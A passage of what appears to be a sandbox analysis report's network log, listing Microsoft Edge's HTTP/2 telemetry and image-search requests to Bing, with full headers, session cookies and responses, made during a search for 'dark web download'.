https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2217%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2217%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 770
content-type: text/html; charset=utf-8
cache-control: no-cache, no-store, must-revalidate
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 67502a4c529a4b9fb9634374c5083844
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-CFMgjOLSWZBNw0/xLGIb4FZxY3nYxsLapWWgeYM86LM='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-ceto-ref: 67502a4c529a4b9fb9634374c5083844|AFD:67502a4c529a4b9fb9634374c5083844|2024-12-04T10:09:16.926Z
date: Wed, 04 Dec 2024 10:09:16 GMT
set-cookie: _C_ETH=1; expires=Tue, 03 Dec 2024 10:09:16 GMT; domain=.bing.com; path=/; secure; httponly
set-cookie: _C_Auth=
set-cookie: bm_sv=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: bm_sv=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306956.7f23496
GET

https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 1001
content-type: text/html; charset=utf-8
cache-control: no-cache
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 67502a4cb8e748d6bb53a5bd5cb250cc
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-GQyV38Hs/x3w8H4nrVXCh3SoHBWCJUrHhPgmENZffsI='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-ceto-ref: 67502a4cb8e748d6bb53a5bd5cb250cc|AFD:67502a4cb8e748d6bb53a5bd5cb250cc|2024-12-04T10:09:16.938Z
date: Wed, 04 Dec 2024 10:09:16 GMT
set-cookie: _C_ETH=1; expires=Tue, 03 Dec 2024 10:09:16 GMT; domain=.bing.com; path=/; secure; httponly
set-cookie: _C_Auth=
set-cookie: _RwBf=r=0&ilt=4&ihpd=0&ispd=4&rc=12&rb=0&gb=0&rg=200&pc=9&mtu=0&rbb=0&g=0&cid=&clo=0&v=4&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:16.9614118+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; domain=.bing.com; expires=Thu, 04-Dec-2025 10:09:16 GMT; path=/; secure; SameSite=None
set-cookie: _Rwho=u=d&ts=2024-12-04; domain=.bing.com; path=/; secure; HttpOnly; SameSite=None
set-cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=12&RB=0&GB=0&RG=200&RP=9; domain=.bing.com; path=/; secure; SameSite=None
set-cookie: bm_sv=; domain=.bing.com; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
set-cookie: bm_sv=; expires=Thu, 01-Jan-1970 08:00:00 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306956.7f2349f
GET

https://www.bing.com/images/sbi?mmasync=1&ig=46DB1346077049719FA2E2E87EA23DEA&iid=.5097&ptn=Web&ep=0&iconpl=1

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /images/sbi?mmasync=1&ig=46DB1346077049719FA2E2E87EA23DEA&iid=.5097&ptn=Web&ep=0&iconpl=1 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306957.7f2352d
GET

https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947630%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947630%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947635%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22Time%22%3A844%2C%22time%22%3A847%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1733306947863%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947630%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947630%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306947635%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22Time%22%3A844%2C%22time%22%3A847%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1733306947863%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=2832&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306957.7f2352e
GET

https://www.bing.com/fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A848%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306947864%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=46DB1346077049719FA2E2E87EA23DEA&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A848%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306947864%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
